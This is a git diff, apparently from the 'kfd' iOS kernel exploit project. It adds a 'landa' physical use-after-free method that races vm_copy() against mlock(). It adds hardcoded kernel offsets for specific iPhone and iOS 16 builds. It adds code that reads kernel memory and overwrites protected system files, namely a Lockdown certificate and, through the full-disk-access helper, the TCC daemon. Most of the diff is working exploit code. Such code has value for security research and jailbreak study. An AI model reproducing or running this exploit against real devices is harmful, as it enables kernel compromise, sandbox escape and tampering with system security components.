b/kfd/libkfd.h index c1d48853..b54841da 100644 --- a/kfd/libkfd.h +++ b/kfd/libkfd.h @@ -13,7 +13,6 @@ #define CONFIG_TIMER 1 #include "libkfd/common.h" -#include "fun.h" /* * The public API of libkfd. @@ -22,6 +21,7 @@ enum puaf_method { puaf_physpuppet, puaf_smith, + puaf_landa, }; enum kread_method { @@ -55,6 +55,7 @@ struct info { i32 pid; u64 tid; u64 vid; + u64 exploit_type; u64 maxfilesperproc; char kern_version[512]; } env; @@ -151,6 +152,8 @@ struct kfd { struct kfd* kfd_init(u64 puaf_pages, u64 puaf_method, u64 kread_method, u64 kwrite_method) { struct kfd* kfd = (struct kfd*)(malloc_bzero(sizeof(struct kfd))); + kfd->info.env.exploit_type = puaf_method; + info_init(kfd); puaf_init(kfd, puaf_pages, puaf_method); krkw_init(kfd, kread_method, kwrite_method); @@ -170,18 +173,33 @@ void kfd_free(struct kfd* kfd) u64 kopen(u64 puaf_pages, u64 puaf_method, u64 kread_method, u64 kwrite_method) { timer_start(); + + bool fail = false; const u64 puaf_pages_min = 16; const u64 puaf_pages_max = 2048; assert(puaf_pages >= puaf_pages_min); assert(puaf_pages <= puaf_pages_max); - assert(puaf_method <= puaf_smith); + assert(puaf_method <= puaf_landa); assert(kread_method <= kread_sem_open); assert(kwrite_method <= kwrite_sem_open); struct kfd* kfd = kfd_init(puaf_pages, puaf_method, kread_method, kwrite_method); + +retry: puaf_run(kfd); - krkw_run(kfd); + fail = krkw_run(kfd); + if(fail && (kfd->info.env.exploit_type == 2)) { + puaf_free(kfd); + info_free(kfd); + bzero(kfd, sizeof(struct kfd)); + info_init(kfd); + puaf_init(kfd, puaf_pages, puaf_method); + krkw_init(kfd, kread_method, kwrite_method); + perf_init(kfd); + goto retry; + } + info_run(kfd); perf_run(kfd); puaf_cleanup(kfd); diff --git a/kfd/libkfd/1.png b/kfd/libkfd/1.png deleted file mode 100644 index 741cbc25..00000000 Binary files a/kfd/libkfd/1.png and /dev/null differ diff --git a/kfd/libkfd/2.png b/kfd/libkfd/2.png deleted file mode 100644 index 8e55158e..00000000 Binary files a/kfd/libkfd/2.png and /dev/null differ diff --git a/kfd/libkfd/3.png b/kfd/libkfd/3.png deleted file mode 100644 index c7650eec..00000000 Binary files a/kfd/libkfd/3.png and /dev/null differ diff --git a/kfd/libkfd/4.png b/kfd/libkfd/4.png deleted file mode 100644 index e6d9ae0a..00000000 Binary files a/kfd/libkfd/4.png and /dev/null differ diff --git a/kfd/libkfd/5.png b/kfd/libkfd/5.png deleted file mode 100644 index 3181e495..00000000 Binary files a/kfd/libkfd/5.png and /dev/null differ diff --git a/kfd/libkfd/6.png b/kfd/libkfd/6.png deleted file mode 100644 index 43b30d7f..00000000 Binary files a/kfd/libkfd/6.png and /dev/null differ diff --git a/kfd/libkfd/7.png b/kfd/libkfd/7.png deleted file mode 100644 index ed428bc6..00000000 Binary files a/kfd/libkfd/7.png and /dev/null differ diff --git a/kfd/libkfd/8.png b/kfd/libkfd/8.png deleted file mode 100644 index 56f789ba..00000000 Binary files a/kfd/libkfd/8.png and /dev/null differ diff --git a/kfd/libkfd/9.png b/kfd/libkfd/9.png deleted file mode 100644 index d9e959dc..00000000 Binary files a/kfd/libkfd/9.png and /dev/null differ diff --git a/kfd/libkfd/AAAA.bin b/kfd/libkfd/AAAA.bin deleted file mode 100644 index a3abe55e..00000000 --- a/kfd/libkfd/AAAA.bin +++ /dev/null @@ -1 +0,0 @@ -PLZ_GIVE_ME_GIRLFRIENDS_!@# diff --git a/kfd/libkfd/PlampyWifi.car b/kfd/libkfd/PlampyWifi.car deleted file mode 100644 index e56a15fc..00000000 Binary files a/kfd/libkfd/PlampyWifi.car and /dev/null differ diff --git a/kfd/libkfd/SFUI.ttf b/kfd/libkfd/SFUI.ttf deleted file mode 100644 index cf058245..00000000 Binary files a/kfd/libkfd/SFUI.ttf and /dev/null differ diff --git a/kfd/libkfd/cert.pem b/kfd/libkfd/cert.pem deleted file mode 100644 index 60213467..00000000 --- a/kfd/libkfd/cert.pem +++ /dev/null @@ -1,18 +0,0 @@ ------BEGIN CERTIFICATE----- -MIIC7jCCAlegAwIBAgIBATANBgkqhkiG9w0BAQsFADBWMQswCQYDVQQGEwJDQTEL -MAkGA1UECAwCQkMxGjAYBgNVBAoMEVdvcnRoIERvaW5nIEJhZGx5MR4wHAYDVQQD -DBVXb3J0aCBEb2luZyBCYWRseSBEREkwHhcNMDcwNDE2MjI1NTMxWhcNMTQwNDE2 -MjI1NTMxWjBWMQswCQYDVQQGEwJDQTELMAkGA1UECAwCQkMxGjAYBgNVBAoMEVdv -cnRoIERvaW5nIEJhZGx5MR4wHAYDVQQDDBVXb3J0aCBEb2luZyBCYWRseSBEREkw -gZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJ75L8F15PbuExawBDsGKMuLCeN9 -XV7aY+7ZcynhfUl/YPEOh3/MkHdqDJv8u6Kphq3UASJbz9rWSvI0Ggi1awC/Fo0r -d0NZTZ1X4JYwpoFoynhbYRZPCV8AX+4GAkCilNRZkSdXJ9Y8vTzgaa2vZl709n9R -DTVOtWgLPK/PfxoFAgMBAAGjgcswgcgwLAYJYIZIAYb4QgENBB8WHU9wZW5TU0wg -R2VuZXJhdGVkIENlcnRpZmljYXRlMB0GA1UdDgQWBBR4cwAYnonzvzDa2Psd3pob -7eGOJTBoBgNVHSMEYTBfoVqkWDBWMQswCQYDVQQGEwJDQTELMAkGA1UECAwCQkMx -GjAYBgNVBAoMEVdvcnRoIERvaW5nIEJhZGx5MR4wHAYDVQQDDBVXb3J0aCBEb2lu -ZyBCYWRseSBEREmCAQEwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQsFAAOB -gQAtCSlLUVRSFE7McKLrqbDULZnv2NhYQA7bcVbykL15/ki5J89v7OVx2+sXdks5 -4eRrn8ur84TR+6iPUe0g3cJ4fmRjfOHUAfCa0qBvJsUViRXgIa9+PaXFIQFy7yy6 -mREglQGCLcO3s100NCcybJC8ufmlzovNkjIRdS4RPSwyRA== ------END CERTIFICATE----- diff --git a/kfd/libkfd/focusmain.caml b/kfd/libkfd/focusmain.caml deleted file mode 100644 index 9ba7cefa..00000000 --- a/kfd/libkfd/focusmain.caml +++ /dev/null @@ -1,35 +0,0 @@ - - - - - - - - - - - - - - - - - diff --git a/kfd/libkfd/info/dynamic_info.h b/kfd/libkfd/info/dynamic_info.h index 503b0ea8..25cb29ac 100644 --- a/kfd/libkfd/info/dynamic_info.h +++ b/kfd/libkfd/info/dynamic_info.h @@ -104,6 +104,87 @@ struct dynamic_info { }; const struct dynamic_info kern_versions[] = { + //iPhone 13 mini 16.5.1 + { + .kern_version = "Darwin Kernel Version 22.5.0: Thu Jun 8 17:14:33 PDT 2023; root:xnu-8796.122.5~1/RELEASE_ARM64_T8110", + .fileglob__fg_ops = 0x28, + .fileglob__fg_data = 0x40 - 8, + .fileops__fo_kqfilter = 0x30, + // .fileproc__fp_iocount = 0x0000, + // .fileproc__fp_vflags = 0x0004, + // .fileproc__fp_flags = 0x0008, + // .fileproc__fp_guard_attrs = 0x000a, + // .fileproc__fp_glob = 0x0010, + // .fileproc__fp_guard = 0x0018, + // .fileproc__object_size = 0x0020, + .fileproc_guard__fpg_guard = 0x8, + .kqworkloop__kqwl_state = 0x10, + .kqworkloop__kqwl_p = 0x18, + .kqworkloop__kqwl_owner = 0xd0, + .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, + .kqworkloop__object_size = 0x108, + .pmap__tte = 0x0, + .pmap__ttep = 0x8, + .proc__p_list__le_next = 0x0, + .proc__p_list__le_prev = 0x8, + .proc__p_pid = 0x60, + .proc__p_fd__fd_ofiles = 0xf8, + .proc__object_size = 0x730, + .pseminfo__psem_usecount = 0x04, + .pseminfo__psem_uid = 0x0c, + .pseminfo__psem_gid = 0x10, + .pseminfo__psem_name = 0x14, + .pseminfo__psem_semobject = 0x38, + // .psemnode__pinfo = 0x0000, + // .psemnode__padding = 0x0008, + // .psemnode__object_size = 0x0010, + .semaphore__owner = 0x28, + .specinfo__si_rdev = 0x18, + .task__map = 0x28, + .task__threads__next = 0x80 - 0x28, + .task__threads__prev = 0x80 - 0x28 + 8, + .task__itk_space = 0x300, + .task__object_size = 0x640, + .thread__task_threads__next = 0x380 - 0x18, + .thread__task_threads__prev = 0x380 - 0x18 + 8, + .thread__map = 0x380, + .thread__thread_id = 0x418, + .thread__object_size = 0x4c0, + .uthread__object_size = 0x200, + .vm_map_entry__links__prev = 0x00, + .vm_map_entry__links__next = 0x08, + .vm_map_entry__links__start = 0x10, + .vm_map_entry__links__end = 0x18, + .vm_map_entry__store__entry__rbe_left = 0x20, + .vm_map_entry__store__entry__rbe_right = 0x28, + .vm_map_entry__store__entry__rbe_parent = 0x30, + .vnode__v_un__vu_specinfo = 0x78, + ._vm_map__hdr__links__prev = 0x00 + 0x8, + ._vm_map__hdr__links__next = 0x08 + 0x8, + ._vm_map__hdr__links__start = 0x10 + 0x8, + ._vm_map__hdr__links__end = 0x18 + 0x8, + ._vm_map__hdr__nentries = 0x30, + ._vm_map__hdr__rb_head_store__rbh_root = 0x38, + ._vm_map__pmap = 0x40, + ._vm_map__hint = 0x90 + 0x08, + ._vm_map__hole_hint = 0x90 + 0x10, + ._vm_map__holes_list = 0x90 + 0x18, + ._vm_map__object_size = 0xc0, + .kernelcache__kernel_base = 0xfffffff007004000, + .kernelcache__cdevsw = 0xfffffff00a471208, + .kernelcache__gPhysBase = 0xfffffff00793c1a0, + .kernelcache__gPhysSize = 0xfffffff00793c1a0 + 8, + .kernelcache__gVirtBase = 0xfffffff00793a378, + .kernelcache__perfmon_devices = 0xfffffff00a4af520, + .kernelcache__perfmon_dev_open = 0xfffffff007efd570, + .kernelcache__ptov_table = 0xfffffff0078ef180, + .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4ae990, + .kernelcache__vm_pages = 0xfffffff0078ebec0, + .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ee130, + .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4ae988, + .kernelcache__vn_kqfilter = 0xfffffff007f4a0d8, + }, + //iPhone 12 mini 16.1.2 { .kern_version = "Darwin Kernel Version 22.1.0: Thu Oct 6 19:34:22 PDT 2022; root:xnu-8792.42.7~1/RELEASE_ARM64_T8101", @@ -172,12 +253,12 @@ const struct dynamic_info kern_versions[] = { ._vm_map__object_size = 0x00c0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3a1168, - .kernelcache__gPhysBase = 0xfffffff007847e40, - .kernelcache__gPhysSize = 0xfffffff007847e48, - .kernelcache__gVirtBase = 0xfffffff007846028, + .kernelcache__gPhysBase = 0xfffffff007847e40, //ok + .kernelcache__gPhysSize = 0xfffffff007847e48, //ok + .kernelcache__gVirtBase = 0xfffffff007846028, //ok .kernelcache__perfmon_devices = 0xfffffff00a3dc330, .kernelcache__perfmon_dev_open = 0xfffffff007ecb5d0, - .kernelcache__ptov_table = 0xfffffff0077fb9c0, + .kernelcache__ptov_table = 0xfffffff0077fb9c0, //ok .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3db780, .kernelcache__vm_pages = 0xfffffff0077f86d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077fa970, @@ -252,12 +333,12 @@ const struct dynamic_info kern_versions[] = { ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a47dab0, - .kernelcache__gPhysBase = 0xfffffff0079541b8, - .kernelcache__gPhysSize = 0xfffffff0079541b8 + 8, - .kernelcache__gVirtBase = 0xfffffff007952370, + .kernelcache__gPhysBase = 0xfffffff0079541b8, //ok + .kernelcache__gPhysSize = 0xfffffff0079541c0, //ok + .kernelcache__gVirtBase = 0xfffffff007952370, //ok .kernelcache__perfmon_devices = 0xfffffff00a4bd520, .kernelcache__perfmon_dev_open = 0xfffffff007f07d78, - .kernelcache__ptov_table = 0xfffffff0079079b8, + .kernelcache__ptov_table = 0xfffffff0079079b8, //no .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4bc910, .kernelcache__vm_pages = 0xfffffff007904100, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007906958, diff --git a/kfd/libkfd/ios16.car b/kfd/libkfd/ios16.car deleted file mode 100644 index c82a8246..00000000 Binary files a/kfd/libkfd/ios16.car and /dev/null differ diff --git a/kfd/libkfd/krkw.h b/kfd/libkfd/krkw.h index 99522059..b4811444 100644 --- a/kfd/libkfd/krkw.h +++ b/kfd/libkfd/krkw.h @@ -33,7 +33,7 @@ // Forward declarations for helper functions. void krkw_helper_init(struct kfd* kfd, struct krkw* krkw); -void krkw_helper_grab_free_pages(struct kfd* kfd); +bool krkw_helper_grab_free_pages(struct kfd* kfd); void krkw_helper_run_allocate(struct kfd* kfd, struct krkw* krkw); void krkw_helper_run_deallocate(struct kfd* kfd, struct krkw* krkw); void krkw_helper_free(struct kfd* kfd, struct krkw* krkw); @@ -84,9 +84,10 @@ void krkw_init(struct kfd* kfd, u64 kread_method, u64 kwrite_method) krkw_helper_init(kfd, &kfd->kwrite); } -void krkw_run(struct kfd* kfd) +bool krkw_run(struct kfd* kfd) { - krkw_helper_grab_free_pages(kfd); + if(krkw_helper_grab_free_pages(kfd)) + return true; timer_start(); krkw_helper_run_allocate(kfd, &kfd->kread); @@ -94,6 +95,7 @@ void krkw_run(struct kfd* kfd) krkw_helper_run_deallocate(kfd, &kfd->kread); krkw_helper_run_deallocate(kfd, &kfd->kwrite); timer_end(); + return false; } void krkw_kread(struct kfd* kfd, u64 kaddr, void* uaddr, u64 size) @@ -121,13 +123,15 @@ void krkw_helper_init(struct kfd* kfd, struct krkw* krkw) krkw->krkw_method_ops.init(kfd); } -void krkw_helper_grab_free_pages(struct kfd* kfd) +bool krkw_helper_grab_free_pages(struct kfd* kfd) { timer_start(); const u64 copy_pages = (kfd->info.copy.size / pages(1)); const u64 grabbed_puaf_pages_goal = (kfd->puaf.number_of_puaf_pages / 4); - const u64 grabbed_free_pages_max = 400000; + u64 grabbed_free_pages_max = 400000; + if(kfd->info.env.exploit_type == 2) + grabbed_free_pages_max = 40000; for (u64 grabbed_free_pages = copy_pages; grabbed_free_pages < grabbed_free_pages_max; grabbed_free_pages += copy_pages) { assert_mach(vm_copy(mach_task_self(), kfd->info.copy.src_uaddr, kfd->info.copy.size, kfd->info.copy.dst_uaddr)); @@ -139,13 +143,14 @@ void krkw_helper_grab_free_pages(struct kfd* kfd) if (++grabbed_puaf_pages == grabbed_puaf_pages_goal) { print_u64(grabbed_free_pages); timer_end(); - return; + return false; } } } } print_warning("failed to grab free pages goal"); + return true; } void krkw_helper_run_allocate(struct kfd* kfd, struct krkw* krkw) diff --git a/kfd/libkfd/lock.caf b/kfd/libkfd/lock.caf deleted file mode 100644 index 4a784b02..00000000 Binary files a/kfd/libkfd/lock.caf and /dev/null differ diff --git a/kfd/libkfd/main.caml b/kfd/libkfd/main.caml deleted file mode 100644 index d089e977..00000000 --- a/kfd/libkfd/main.caml +++ /dev/null @@ -1,64 +0,0 @@ - - - - - diff --git a/kfd/libkfd/mainbluetooth.caml b/kfd/libkfd/mainbluetooth.caml deleted file mode 100644 index 71cce332..00000000 --- a/kfd/libkfd/mainbluetooth.caml +++ /dev/null @@ -1,26 +0,0 @@ - - - - - diff --git a/kfd/libkfd/mainbrightness.caml b/kfd/libkfd/mainbrightness.caml deleted file mode 100644 index 73a7c51b..00000000 --- a/kfd/libkfd/mainbrightness.caml +++ /dev/null @@ -1,46 +0,0 @@ - - - - - diff --git a/kfd/libkfd/mainforwardbackward.caml b/kfd/libkfd/mainforwardbackward.caml deleted file mode 100644 index 9b9eb248..00000000 --- a/kfd/libkfd/mainforwardbackward.caml +++ /dev/null @@ -1,50 +0,0 @@ - - - - - diff --git a/kfd/libkfd/mainplaypausestop.caml b/kfd/libkfd/mainplaypausestop.caml deleted file mode 100644 index 11412685..00000000 --- a/kfd/libkfd/mainplaypausestop.caml +++ /dev/null @@ -1,96 +0,0 @@ - - - - - diff --git a/kfd/libkfd/mainvolume.caml b/kfd/libkfd/mainvolume.caml deleted file mode 100644 index f3894048..00000000 --- a/kfd/libkfd/mainvolume.caml +++ /dev/null @@ -1,52 +0,0 @@ - - - - - diff --git a/kfd/libkfd/mainwifi.caml b/kfd/libkfd/mainwifi.caml deleted file mode 100644 index 74e1e962..00000000 --- a/kfd/libkfd/mainwifi.caml +++ /dev/null @@ -1,25 +0,0 @@ - - - - - diff --git a/kfd/libkfd/modules.materialrecipe b/kfd/libkfd/modules.materialrecipe deleted file mode 100644 index 56cbbd05..00000000 Binary files a/kfd/libkfd/modules.materialrecipe and /dev/null differ diff --git a/kfd/libkfd/modulesBackground.materialrecipe b/kfd/libkfd/modulesBackground.materialrecipe deleted file mode 100644 index 670aafe6..00000000 Binary files a/kfd/libkfd/modulesBackground.materialrecipe and /dev/null differ diff --git a/kfd/libkfd/other-0-+--white.png b/kfd/libkfd/other-0-+--white.png deleted file mode 100644 index 7516bfaf..00000000 Binary files a/kfd/libkfd/other-0-+--white.png and /dev/null differ diff --git a/kfd/libkfd/ps.log b/kfd/libkfd/ps.log deleted file mode 100644 index e69de29b..00000000 diff --git a/kfd/libkfd/puaf.h b/kfd/libkfd/puaf.h index 1bd41def..5bf6483a 100644 --- a/kfd/libkfd/puaf.h +++ b/kfd/libkfd/puaf.h @@ -10,6 +10,7 @@ void puaf_helper_get_vm_map_first_and_last(u64* first_out, u64* last_out); void puaf_helper_get_vm_map_min_and_max(u64* min_out, u64* max_out); void puaf_helper_give_ppl_pages(void); +#include "puaf/landa.h" #include "puaf/physpuppet.h" #include "puaf/smith.h" @@ -30,6 +31,7 @@ void puaf_init(struct kfd* kfd, u64 puaf_pages, u64 puaf_method) kfd->puaf.puaf_pages_uaddr = (u64*)(malloc_bzero(kfd->puaf.number_of_puaf_pages * sizeof(u64))); switch (puaf_method) { + puaf_method_case(landa) puaf_method_case(physpuppet) puaf_method_case(smith) } diff --git a/kfd/libkfd/puaf/landa.h b/kfd/libkfd/puaf/landa.h new file mode 100644 index 00000000..e4ac39f4 --- /dev/null +++ b/kfd/libkfd/puaf/landa.h @@ -0,0 +1,195 @@ +/* + * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. + */ + +#ifndef landa_h +#define landa_h + +const u64 landa_vme1_size = pages(1); +const u64 landa_vme2_size = pages(1); +const u64 landa_vme4_size = pages(1); + +// Forward declarations for helper functions. +void* landa_helper_spinner_pthread(void* arg); + +struct landa_data { + atomic_bool main_thread_returned; + atomic_bool spinner_thread_started; + vm_address_t copy_src_address; + vm_address_t copy_dst_address; + vm_size_t copy_size; +}; + +void landa_init(struct kfd* kfd) +{ + kfd->puaf.puaf_method_data_size = sizeof(struct landa_data); + kfd->puaf.puaf_method_data = malloc_bzero(kfd->puaf.puaf_method_data_size); +} + +void landa_run(struct kfd* kfd) +{ + struct landa_data* landa = (struct landa_data*)(kfd->puaf.puaf_method_data); + + /* + * Note: + * - The size of [src/dst]_vme_3 must be equal to pages(X), i.e. the desired PUAF size. + * - The copy_size must be greater than msg_ool_size_small (32 KiB), therefore it is + * sufficient for [src/dst]_vme_1 and [src/dst]_vme_2 to have a size of pages(1). + */ + u64 landa_vme3_size = pages(kfd->puaf.number_of_puaf_pages); + vm_size_t copy_size = landa_vme1_size + landa_vme2_size + landa_vme3_size; + landa->copy_size = copy_size; + + /* + * STEP 1A: + * + * Allocate the source VMEs and VMOs: + * - src_vme_1 has a size of pages(1) and owns the only reference to src_vmo_1. + * - src_vme_2 has a size of pages(1) and owns the only reference to src_vmo_2. + * - src_vme_3 has a size of pages(X) and owns the only reference to src_vmo_3. + */ + vm_address_t src_address = 0; + vm_size_t src_size = copy_size; + assert_mach(vm_allocate(mach_task_self(), &src_address, src_size, VM_FLAGS_ANYWHERE | VM_FLAGS_RANDOM_ADDR)); + landa->copy_src_address = src_address; + + vm_address_t vme1_src_address = src_address; + vm_address_t vme2_src_address = vme1_src_address + landa_vme1_size; + vm_address_t vme3_src_address = vme2_src_address + landa_vme2_size; + assert_mach(vm_allocate(mach_task_self(), &vme1_src_address, landa_vme1_size, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_FLAGS_PURGABLE)); + assert_mach(vm_allocate(mach_task_self(), &vme2_src_address, landa_vme2_size, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_FLAGS_PURGABLE)); + assert_mach(vm_allocate(mach_task_self(), &vme3_src_address, landa_vme3_size, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_FLAGS_PURGABLE)); + + memset((void*)(src_address), 'A', copy_size); + + /* + * STEP 1B: + * + * Allocate the destination VMEs and VMOs: + * - dst_vme_1 has a size of pages(1) and owns the only reference to dst_vmo_1. + * dst_vme_1->user_wired_count == MAX_WIRE_COUNT, because of the mlock() for-loop. + * - dst_vme_2 has a size of pages(1) and owns the only reference to dst_vmo_2. + * dst_vme_2->is_shared == TRUE, because of the vm_remap() on itself. + * dst_vme_2->user_wired_count == 1, because of mlock(). + * - After the clip in vm_protect(), dst_vme_3 has a size of pages(X) and dst_vme_4 has a size of pages(1). + * dst_vme_3 and dst_vme_4 each have a reference to dst_vmo_3. + */ + vm_address_t dst_address = 0; + vm_size_t dst_size = copy_size + landa_vme4_size; + assert_mach(vm_allocate(mach_task_self(), &dst_address, dst_size, VM_FLAGS_ANYWHERE | VM_FLAGS_RANDOM_ADDR)); + landa->copy_dst_address = dst_address; + + vm_address_t vme1_dst_address = dst_address; + vm_address_t vme2_dst_address = vme1_dst_address + landa_vme1_size; + vm_address_t vme3_dst_address = vme2_dst_address + landa_vme2_size; + vm_address_t vme4_dst_address = vme3_dst_address + landa_vme3_size; + vm_prot_t cur_protection = VM_PROT_DEFAULT; + vm_prot_t max_protection = VM_PROT_ALL; + assert_mach(vm_allocate(mach_task_self(), &vme1_dst_address, landa_vme1_size, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_FLAGS_PURGABLE)); + assert_mach(vm_allocate(mach_task_self(), &vme2_dst_address, landa_vme2_size, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_FLAGS_PURGABLE)); + assert_mach(vm_remap(mach_task_self(), &vme2_dst_address, landa_vme2_size, 0, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE, + mach_task_self(), vme2_dst_address, FALSE, &cur_protection, &max_protection, VM_INHERIT_DEFAULT)); + assert_mach(vm_allocate(mach_task_self(), &vme3_dst_address, landa_vme3_size + landa_vme4_size, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_FLAGS_PURGABLE)); + assert_mach(vm_protect(mach_task_self(), vme4_dst_address, landa_vme4_size, FALSE, VM_PROT_READ)); + + memset((void*)(dst_address), 'B', copy_size); + + for (u64 i = 0; i < UINT16_MAX; i++) { + assert_bsd(mlock((void*)(vme1_dst_address), landa_vme1_size)); + } + + assert_bsd(mlock((void*)(vme2_dst_address), landa_vme2_size)); + + /* + * STEP 2: + * + * Trigger the race condition between vm_copy() in the main thread and mlock() in the spinner thread. + */ + pthread_t spinner_thread = NULL; + assert_bsd(pthread_create(&spinner_thread, NULL, landa_helper_spinner_pthread, kfd)); + + while (!atomic_load(&landa->spinner_thread_started)) { + usleep(10); + } + + assert_mach(vm_copy(mach_task_self(), src_address, copy_size, dst_address)); + atomic_store(&landa->main_thread_returned, true); + assert_bsd(pthread_join(spinner_thread, NULL)); + + /* + * STEP 3: + * + * Deallocate dst_vme_4, which will in turn deallocate the last reference of dst_vmo_3. + * Therefore, dst_vmo_3 will be reaped and its pages put back on the free list. + * However, we now have a PUAF on up to X of those pages in the VA range of dst_vme_3. + */ + assert_mach(vm_deallocate(mach_task_self(), vme4_dst_address, landa_vme4_size)); + + for (u64 i = 0; i < kfd->puaf.number_of_puaf_pages; i++) { + kfd->puaf.puaf_pages_uaddr[i] = vme3_dst_address + pages(i); + } +} + +void landa_cleanup(struct kfd* kfd) +{ + struct landa_data* landa = (struct landa_data*)(kfd->puaf.puaf_method_data); + u64 kread_page_uaddr = trunc_page(kfd->kread.krkw_object_uaddr); + u64 kwrite_page_uaddr = trunc_page(kfd->kwrite.krkw_object_uaddr); + + u64 min_puaf_page_uaddr = min(kread_page_uaddr, kwrite_page_uaddr); + u64 max_puaf_page_uaddr = max(kread_page_uaddr, kwrite_page_uaddr); + + assert_mach(vm_deallocate(mach_task_self(), landa->copy_src_address, landa->copy_size)); + + vm_address_t address1 = landa->copy_dst_address; + vm_size_t size1 = min_puaf_page_uaddr - landa->copy_dst_address; + assert_mach(vm_deallocate(mach_task_self(), address1, size1)); + + vm_address_t address2 = max_puaf_page_uaddr + pages(1); + vm_size_t size2 = (landa->copy_dst_address + landa->copy_size) - address2; + assert_mach(vm_deallocate(mach_task_self(), address2, size2)); + + /* + * No middle block if the kread and kwrite pages are the same or back-to-back. + */ + if ((max_puaf_page_uaddr - min_puaf_page_uaddr) > pages(1)) { + vm_address_t address3 = min_puaf_page_uaddr + pages(1); + vm_size_t size3 = (max_puaf_page_uaddr - address3); + assert_mach(vm_deallocate(mach_task_self(), address3, size3)); + } +} + +void landa_free(struct kfd* kfd) +{ + u64 kread_page_uaddr = trunc_page(kfd->kread.krkw_object_uaddr); + u64 kwrite_page_uaddr = trunc_page(kfd->kwrite.krkw_object_uaddr); + + assert_mach(vm_deallocate(mach_task_self(), kread_page_uaddr, pages(1))); + if (kwrite_page_uaddr != kread_page_uaddr) { + assert_mach(vm_deallocate(mach_task_self(), kwrite_page_uaddr, pages(1))); + } +} + +/* + * Helper landa functions. + */ + +void* landa_helper_spinner_pthread(void* arg) +{ + struct kfd* kfd = (struct kfd*)(arg); + struct landa_data* landa = (struct landa_data*)(kfd->puaf.puaf_method_data); + + atomic_store(&landa->spinner_thread_started, true); + + while (!atomic_load(&landa->main_thread_returned)) { + kern_return_t kret = mlock((void*)(landa->copy_dst_address), landa->copy_size); + assert((kret == KERN_SUCCESS) || ((kret == (-1)) && (errno == ENOMEM))); + if (kret == KERN_SUCCESS) { + break; + } + } + + return NULL; +} + +#endif /* landa_h */ diff --git a/kfd/overwrite/fun.h b/kfd/overwrite/fun.h new file mode 100644 index 00000000..0fa54758 --- /dev/null +++ b/kfd/overwrite/fun.h @@ -0,0 +1,15 @@ +// +// fun.h +// kfd +// +// Created by Seo Hyun-gyu on 2023/07/25. +// + +#ifndef fun_h +#define fun_h + +#include + +int do_fun(void); + +#endif /* fun_h */ diff --git a/kfd/overwrite/fun.m b/kfd/overwrite/fun.m new file mode 100644 index 00000000..ba20cd4c --- /dev/null +++ b/kfd/overwrite/fun.m @@ -0,0 +1,42 @@ +// +// fun.c +// kfd +// +// Created by Seo Hyun-gyu on 2023/07/25. +// + +#include "krw.h" +#include "offsets.h" +#include +#import +#import +#import +#include +#include +#include +#include +#include +#include "proc.h" +#include "vnode.h" +#include "grant_full_disk_access.h" +#include "thanks_opa334dev_htrowii.h" +#include "utils.h" + +int do_fun(void) { + + _offsets_init(); + + uint64_t kslide = get_kslide(); + uint64_t kbase = 0xfffffff007004000 + kslide; + printf("[i] Kernel base: 0x%llx\n", kbase); + printf("[i] Kernel slide: 0x%llx\n", kslide); + uint64_t kheader64 = kread64(kbase); + printf("[i] Kernel base kread64 ret: 0x%llx\n", kheader64); + + pid_t myPid = getpid(); + uint64_t selfProc = getProc(myPid); + printf("[i] self proc: 0x%llx\n", selfProc); + funVnodeOverwrite2("/System/Library/Lockdown/iPhoneDebug.pem", [NSString stringWithFormat:@"%@%@", NSBundle.mainBundle.bundlePath, @"/files/cert.pem"].UTF8String); + + return 0; +} diff --git a/kfd/fun/grant_full_disk_access.h b/kfd/overwrite/grant_full_disk_access.h similarity index 51% rename from kfd/fun/grant_full_disk_access.h rename to kfd/overwrite/grant_full_disk_access.h index d57c07d6..31a99b94 100644 --- a/kfd/fun/grant_full_disk_access.h +++ b/kfd/overwrite/grant_full_disk_access.h @@ -1,5 +1,5 @@ #import /// Uses kfd exploit to grant the current app read/write access outside the sandbox. -void kfd_grant_full_disk_access(void (^_Nonnull completion)(NSError* _Nullable)); -bool kfd_patch_installd(void); +void grant_full_disk_access(void (^_Nonnull completion)(NSError* _Nullable)); +bool patch_installd(void); diff --git a/kfd/fun/grant_full_disk_access.m b/kfd/overwrite/grant_full_disk_access.m similarity index 97% rename from kfd/fun/grant_full_disk_access.m rename to kfd/overwrite/grant_full_disk_access.m index 9fc068b2..0d9d855d 100644 --- a/kfd/fun/grant_full_disk_access.m +++ b/kfd/overwrite/grant_full_disk_access.m @@ -328,11 +328,11 @@ static bool overwrite_file(int fd, NSData* sourceData) { kwrite32(to_vnode + off_vnode_v_writecount, to_vnode_v_writecount + 1); printf("[+] overwrite_file vnode->v_writecount: %d\n", kread32(to_vnode + off_vnode_v_writecount)); } - /* + for (int off = 0; off < sourceData.length; off += 0x4000) { bool success = false; for (int i = 0; i < 2; i++) { - if (kfd_unaligned_copy_switch_race( + if (unaligned_copy_switch_race( fd, off, sourceData.bytes + off, off + 0x4000 > sourceData.length ? sourceData.length - off : 0x4000, false)) { success = true; @@ -344,9 +344,7 @@ static bool overwrite_file(int fd, NSData* sourceData) { kwrite32(rootvnode_mount + off_mount_mnt_flag, rootvnode_mnt_flag); return false; } - }*/ - [sourceData writeToFile: [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/tccd"] atomically: true]; - funVnodeOverwriteFile((char *) [[NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/tccd"] UTF8String], "/System/Library/PrivateFrameworks/TCC.framework/Support/tccd"); + } 